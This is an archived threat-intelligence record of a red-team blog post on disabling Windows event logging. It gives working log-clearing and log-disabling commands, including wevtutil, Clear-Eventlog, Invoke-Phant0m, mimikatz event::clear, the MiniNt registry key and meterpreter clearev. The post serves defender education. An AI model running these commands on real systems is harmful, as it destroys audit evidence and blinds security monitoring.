{
	"id": "ef7f33e8-f0ff-4759-9186-f10b852083bd",
	"created_at": "2026-04-06T00:19:41.582311Z",
	"updated_at": "2026-04-10T13:11:31.510443Z",
	"deleted_at": null,
	"sha1_hash": "d768cc75e7be47a5aee298cecd4d4df0e6f4bba9",
	"title": "Defense Evasion: Windows Event Logging (T1562.002)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 452337,
	"plain_text": "Defense Evasion: Windows Event Logging (T1562.002)\r\nBy raj\r\nPublished: 2021-04-22 · Archived: 2026-04-05 22:06:27 UTC\r\nIn this post, we explore Windows Event Logging defense evasion techniques used by attackers to avoid detection.\r\nBy disabling, bypassing, or tampering with event logs using tools and scripts, threat actors can cover their tracks\r\nand stay hidden from security teams. Understanding these techniques is crucial for defenders to strengthen\r\nmonitoring and response capabilities.\r\nDefense Evasion is a cyber kill chain attack strategy that includes strategies used by attackers to prevent detection\r\nduring their violation.\r\nMITRE TACTIC: Defenses Evasion (TA0005)\r\nMITRE TECHNIQUE: Impair Defence (T1562)\r\nSUBTITLE: Disable Windows Event Logging (T1562.002)\r\nTable of Contents\r\nClear Event log using Wevtutil Command\r\nClear Event log using Powershell\r\nPhantom\r\nMimikatz\r\nMiniNT registry key\r\nPowershell Empire\r\nMetasploit\r\nTo restrict the amount of data that can be used for detection and audits, an attacker can disable Windows event\r\nlogging. Login attempts, process development, other user and device behaviour are all recorded in Windows event\r\nlogs. Intelligence software and analysts use this information to identify the artifacts.\r\nClear Event log using Wevtutil Command\r\nIt’s a system tool that lets you look up details on event logs and publishers. You can also use this command for\r\ninstalling and uninstalling event manifests, exporting, archiving, and clearing logs.\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 1 of 10\n\nExecute the following command with administrator right:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nwevtutil cl security\r\nwevtutil cl security\r\nwevtutil cl security\r\n😊 All logs are clear now, but one log will be generated with event ID 1102 for clearing logs\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 2 of 10\n\nClear Event log using Powershell\r\nAnother method is to use PowerShell for clearing logs, as you can observe that the machine has a system \u0026\r\nsecurity log.\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 3 of 10\n\nRun Powershell as administrator and execute the following command:\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 4 of 10\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nClear-Eventlog -LogName Security\r\nClear-Eventlog -LogName System\r\nClear-Eventlog -LogName Security Clear-Eventlog -LogName System\r\nClear-Eventlog -LogName Security\r\nClear-Eventlog -LogName System\r\nThe above command will clear all logs from inside System \u0026 security.\r\nPhantom\r\nThis script walks thread stacks of the Event Log Service process (specific svchost.exe) and identifies Event Log\r\nThreads to kill Event Log Service Threads. So, the system will not be able to collect logs and at the same time, the\r\nEvent Log Service will appear to be running. Download it from here\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\npowershell -ep bypass\r\nImport-Module .Invoke-Phant0m.ps1\r\nInvoke-Phantom\r\npowershell -ep bypass Import-Module .Invoke-Phant0m.ps1 Invoke-Phantom\r\npowershell -ep bypass\r\nImport-Module .Invoke-Phant0m.ps1\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 5 of 10\n\nInvoke-Phantom\r\nMimikatz\r\nHow can we forget the mimikatz when it comes to the red teaming approach? Mimikatz is the most effective\r\nmethod, allowing you to not only steal the credential but also clear the log from within the event viewer.\r\nRun mimikatz as administrator and execute the following command:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nprivilege::debug\r\nevent::\r\nevent::clear\r\nprivilege::debug event:: event::clear\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 6 of 10\n\nprivilege::debug\r\nevent::\r\nevent::clear\r\nMiniNT registry key\r\nYou can play with the registry, create a new registry key as mention below, and reboot the machine to reload the\r\nhive.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt\"\r\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt\"\r\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt\"\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 7 of 10\n\nThis key disables the event viewer and thus restricts it from generating the logs.\r\nPowerShell Empire\r\nThe PowerShell Empire can also be used to clear logs, classify Event Log threads, and destroy Event Log Service\r\nthreads.\r\nUse the following command to execute the module for respected agents:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nusemodule management/phant0m\r\nexecute\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 8 of 10\n\nusemodule management/phant0m execute\r\nusemodule management/phant0m\r\nexecute\r\nMetasploit\r\nLast but not least, we have the Metasploit framework to clean applications, security \u0026 system logs from within the\r\nevent viewer. In the meterperter session, you can execute the following command.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nclearev\r\nclearev\r\nclearev\r\nDisabling Windows Event Logging is a common defense evasion technique used by attackers. Understanding how\r\nthis tactic works is crucial for defenders to detect and mitigate such stealthy attacks.\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 9 of 10\n\nFor more MITRE ATT\u0026CK refer this: Link\r\nReference: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c\r\nAuthor: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant\r\nSocial Media Lover and Gadgets. Contact here\r\nPost navigation\r\nSource: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nhttps://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/"
	],
	"report_names": [
		"defense-evasion-windows-event-logging-t1562-002"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434781,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.pdf",
		"text": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.txt",
		"img": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.jpg"
	}
}